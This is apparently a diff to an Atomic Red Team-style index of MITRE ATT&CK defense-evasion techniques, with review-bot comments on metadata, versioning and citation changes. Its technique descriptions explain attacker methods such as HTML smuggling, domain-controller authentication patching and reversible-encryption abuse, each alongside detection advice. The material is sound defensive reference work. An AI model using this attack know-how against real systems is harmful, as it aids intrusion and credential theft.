+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
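Review bot: the new T1070.010 (Relocate Malware) object at the top of this hunk lands with `x_mitre_detection: ''`, a single data source ('File: File Modification') across Linux, macOS, Windows and Network, and `atomic_tests: []`, so it adds a defense-evasion technique to the index with nothing runnable behind it; that is fine for a data refresh, but it should be tracked as a coverage gap rather than read as "covered". Its placement ahead of T1556.009 follows the attack-pattern id ordering (cc36eeae... sorts before the later d3/d4/d5/d6 ids), not the technique number, which is worth knowing when scanning the rest of this patch. The 'Azure AD' to 'Entra ID' rename in the T1556.009 description is correct and matches the platform relabel in the next hunk.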
@@ -27275,10 +27531,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
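Review bot: the platform list for T1556.009 swaps 'Azure AD' and 'SaaS' for 'Identity Provider' (keeping 'IaaS') and bumps x_mitre_version to '1.1', which is consistent with the 'Entra ID' wording in the description just above, but anything downstream that selects techniques by the old 'Azure AD' or 'SaaS' platform strings will silently stop matching T1556.009; check the index consumers for hard-coded platform names before merging. The data sources that follow still list 'Active Directory: Active Directory Object Modification' next to a platform list with no Windows entry; that is upstream ATT&CK data, not something to fix here, but it reads oddly and may surprise anyone mapping data sources to platforms.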
@@ -27315,40 +27570,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -27357,20 +27582,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
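Review bot: the Mandiant M-Trends 2020 reference at the end of this hunk changes its URL from content.fireeye.com to www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf but keeps 'Retrieved April 24, 2020', whereas the other relinked citation in this patch (nccgroup, further down) resets its retrieval date when the URL changed; either date the new link or keep the old URL, since a 2020 retrieval date on a path containing '2021-09' is misleading to anyone verifying sources. Also in this hunk, `x_mitre_permissions_required: - User` is dropped from T1578.002 with no replacement field as part of the 3.2.0 rebuild; see the note on T1556.001 below for why that makes the index inconsistent.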
@@ -27400,7 +27655,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -27443,8 +27698,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
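Review bot: this hunk deletes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.009 without adding a replacement, so in the visible context the object ends up with no attack spec version at all, while the objects rebuilt elsewhere in this patch (T1578.002, T1036.010, T1556.001, T1556.005, T1070.004) get `x_mitre_attack_spec_version: 3.2.0`. The same delete-only pattern repeats for T1601.001, T1221, Hidden File System and T1055.005. Either these objects should be regenerated from the same ATT&CK snapshot as the rest, or the generator should preserve the version field instead of stripping it. Dropping the `spec_version` line on its own is applied uniformly across the patch, so that part is fine.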
@@ -27491,7 +27744,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -27557,12 +27810,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -27617,33 +27868,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
- technique:
- x_mitre_platforms:
- - Windows
+ T1036.010:
+ technique:
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
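Review bot: this hunk reads as though T1556.001 were deleted and replaced by T1036.010, but it is an insertion: the new 'Masquerade Account Name' object (attack-pattern--d349c66e...) sorts between T1070.009 and T1556.001 (attack-pattern--d4b96d2c...) because the index is ordered by STIX id, and T1556.001 is re-emitted in the following hunk with its Dell Skeleton and TechNet Audit Policy references intact. Two things to tidy before merging: the T1036.010 description carries a stray escaped space before the final paragraph break ('\ \n\n'), which the generator could normalise rather than pass through from the STIX text, and the new entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, so it adds nothing runnable to the index yet.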
@@ -27664,6 +27966,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -27678,22 +27981,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
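Review bot: `x_mitre_permissions_required: - Administrator` disappears from T1556.001 in this hunk, as it does from T1578.002 and T1556.005 elsewhere in the patch, but the objects that were not rebuilt (T1601.001, T1221, Hidden File System) keep the field, so after this change the index is inconsistent about whether a technique declares its privilege requirement. If the field has been retired upstream, strip it everywhere in one pass and point consumers at the per-test `elevation_required` flag (as on the HTML Smuggling test in the next hunk) instead; if it has not, the rebuilt objects should retain it.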
@@ -27751,13 +28074,12 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests:
- name: HTML Smuggling Remote Payload
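Review bot: the nccgroup citation is relinked from research.nccgroup.com to a www.nccgroup.com research-blog slug ending in 'internet-exploreredge' (no separator between 'explorer' and 'edge'), with the retrieval date reset to September 12, 2024; the slug is plausible for that site's migration but is exactly the kind of URL that gets mistyped, so fetch it once before the index ships. The x_mitre_attack_spec_version bump to 3.2.0 and the spec_version removal for T1027.006 here match the other rebuilt objects.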
@@ -27788,37 +28110,7 @@ defense-evasion:
elevation_required: false
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -27840,6 +28132,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -27850,23 +28143,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -27907,8 +28227,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -27944,43 +28265,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
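Review bot: the technique name at the top of this hunk, 'Indicator Removal on Host: File Deletion', is carried over verbatim even though the object is otherwise refreshed (modified 2024-10-15, spec 3.2.0); ATT&CK renamed the parent T1070 to 'Indicator Removal' in v12 and the STIX name of T1070.004 is simply 'File Deletion', so either the name is sourced from the atomic's own display name rather than the STIX object, which the generator should document, or it is stale. Also, the description block has its inline code spans split onto their own lines ('del' / 'on Windows and rm' / 'or unlink'), which inside a `|-` literal block become real newlines in the rendered description; the same tag-stripping artefact shows in the T1578.002 ('RunInstances') and T1556.005 ('Set-ADUser', 'Set-ADAccountControl') detection text, so the generator should collapse whitespace where it removes HTML tags.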
@@ -27991,18 +28292,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests:
- name: Delete a single file - FreeBSD/Linux/macOS
@@ -28346,7 +28665,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
